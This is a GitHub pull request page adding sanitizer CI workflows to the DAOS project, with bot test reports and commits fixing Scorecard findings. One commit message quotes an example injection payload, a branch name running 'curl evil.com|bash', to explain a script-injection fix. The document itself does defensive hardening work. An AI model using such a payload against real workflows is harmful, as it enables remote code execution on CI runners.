Skip to content

DAOS-18626 cq: ASAN Men check with GitHub Action#18557

Draft
knard38 wants to merge 1 commit into
ckochhof/dev/master/daos-18826/patch-001from
ckochhof/dev/master/daos-18626/patch-001
Draft

DAOS-18626 cq: ASAN Men check with GitHub Action#18557
knard38 wants to merge 1 commit into
ckochhof/dev/master/daos-18826/patch-001from
ckochhof/dev/master/daos-18626/patch-001

Conversation

@knard38

@knard38 knard38 commented Jun 26, 2026

Copy link
Copy Markdown
Contributor

TODO

Steps for the author:

  • Commit message follows the guidelines.
  • Appropriate Features or Test-tag pragmas were used.
  • Appropriate Functional Test Stages were run.
  • At least two positive code reviews including at least one code owner from each category referenced in the PR.
  • Testing is complete. If necessary, forced-landing label added and a reason added in a comment.

After all prior steps are complete:

  • Gatekeeper requested (daos-gatekeeper added as a reviewer).

@knard38 knard38 self-assigned this Jun 26, 2026
@github-actions

Copy link
Copy Markdown

Ticket title is 'ASAN Men check with GitHub Action'
Status is 'In Progress'
https://daosio.atlassian.net/browse/DAOS-18626

Comment thread .github/workflows/unit-test-template.yml Fixed
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 49ca01a to 513c51b Compare June 26, 2026 14:13
@knard38 knard38 changed the base branch from master to ckochhof/dev/master/daos-18826/patch-001 June 26, 2026 14:14
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 513c51b to 9ca93b1 Compare June 26, 2026 18:44
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/memcheck.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
@daosbuild3

Copy link
Copy Markdown
Collaborator

@github-advanced-security

Copy link
Copy Markdown

You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

  • The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
  • Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
  • You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

Comment thread .github/workflows/memcheck.yml Fixed
@daosbuild3

Copy link
Copy Markdown
Collaborator

Test stage Functional Hardware Large MD on SSD completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/12/execution/node/1330/log

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 9bb48e6 to 1929d2b Compare June 29, 2026 07:30
knard38 pushed a commit that referenced this pull request Jun 29, 2026
Fixes three issues flagged by GitHub Scorecard on PR #18557:

1. [CRITICAL score=0] Dangerous-Workflow: script injection in memcheck.yml
   The 'Resolve SARIF ref and SHA' step interpolated GitHub context values
   (${{ github.event.pull_request.head.ref }}, etc.) directly into a
   bash run: block. A PR branch name containing shell metacharacters
   (e.g. 'main"; curl evil.com|bash; echo') would execute arbitrary code.
   Fix: pass all context values through an env: block and reference them
   as ${ENV_VAR} in the shell, following GitHub's recommended remediation.

2+3. [WARNING score=7] Token-Permissions: top-level permissions in tsan.yml
   security-events: write and checks: write were set at the workflow
   top level. Best practice is to set permissions at the job level so
   that only the specific job that needs them receives elevated access.
   Fix: remove the top-level permissions block from tsan.yml and add
   a permissions: section directly under the build-daos_tsan job.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
knard38 pushed a commit that referenced this pull request Jun 29, 2026
Fixes three open Scorecard findings from PR #18557:

1. Pinned-Dependencies (score=3): codeql-action/upload-sarif@v4 is a
   floating tag. Scorecard requires actions to be pinned by full commit
   SHA to prevent supply-chain attacks.
   Fix: replace @v4 with @8aad20d150bbac5944a9f9d289da16a4b0d87c1e
   (v4.36.2) in both memcheck.yml (2 occurrences) and tsan.yml (1).
   This SHA is already used by other workflows in the repository.

2. Token-Permissions (score=8): no top-level permission defined in
   tsan.yml after we moved permissions to job-level. Scorecard requires
   an explicit top-level permissions block so any future job added to
   the workflow gets the minimum access (read-only) by default.
   Fix: add 'permissions: {}' at workflow top-level in tsan.yml.

Note: Token-Permissions score=8 for 'jobLevel checks: write' in
tsan.yml (finding 3490170495) is expected and accepted — this
permission is required by the action-junit-report action to post test
result checks, and the same pattern is used without issue in memcheck.yml.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/asan.yml Fixed
Comment thread .github/workflows/asan.yml Fixed
Comment thread .github/workflows/unit-test-template.yml Fixed
Comment thread .github/workflows/sanitizer-template.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
Comment thread .github/workflows/tsan.yml Fixed
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch 2 times, most recently from 6e5ef4b to 98995d5 Compare June 29, 2026 13:45
Comment thread .github/workflows/ubsan.yml Fixed
Comment thread .github/workflows/ubsan.yml Fixed
Comment thread .github/workflows/unit-testing.yml Fixed
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 7dfbd60 to f798de2 Compare June 30, 2026 14:12
@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 0fe6c20 to 678e4a0 Compare June 30, 2026 15:28
Comment thread .github/workflows/sanitizer-template.yml Fixed
@daosbuild3

Copy link
Copy Markdown
Collaborator

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 678e4a0 to 08e21c2 Compare June 30, 2026 15:38
@daosbuild3

Copy link
Copy Markdown
Collaborator

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 08e21c2 to 3012815 Compare July 1, 2026 07:40
@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/50/testReport/

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 3012815 to 29af6c0 Compare July 1, 2026 09:33
@@ -0,0 +1,268 @@
# SPDX-License-Identifier: BSD-2-Clause-Patent
artifact_name: 'test-results-unit'
check_name: 'Unit Testing'
permissions:
checks: write
artifact_name: 'test-results-asan'
check_name: 'Unit Test Results (ASan build)'
permissions:
security-events: write
check_name: 'Unit Test Results (ASan build)'
permissions:
security-events: write
checks: write
artifact_name: 'test-results-tsan'
check_name: 'Unit Test Results (TSan build)'
permissions:
security-events: write
check_name: 'Unit Test Results (TSan build)'
permissions:
security-events: write
checks: write
artifact_name: 'test-results-ubsan'
check_name: 'Unit Test Results (UBSan build)'
permissions:
security-events: write
check_name: 'Unit Test Results (UBSan build)'
permissions:
security-events: write
checks: write
@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/51/testReport/

@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 5582f20 to 1cd88d5 Compare July 1, 2026 12:37
@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

@daosbuild3

Copy link
Copy Markdown
Collaborator

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/55/testReport/

…caffold

TODO

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 1cd88d5 to 3036055 Compare July 1, 2026 13:55
@daosbuild3

Copy link
Copy Markdown
Collaborator

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Development

Successfully merging this pull request may close these issues.

4 participants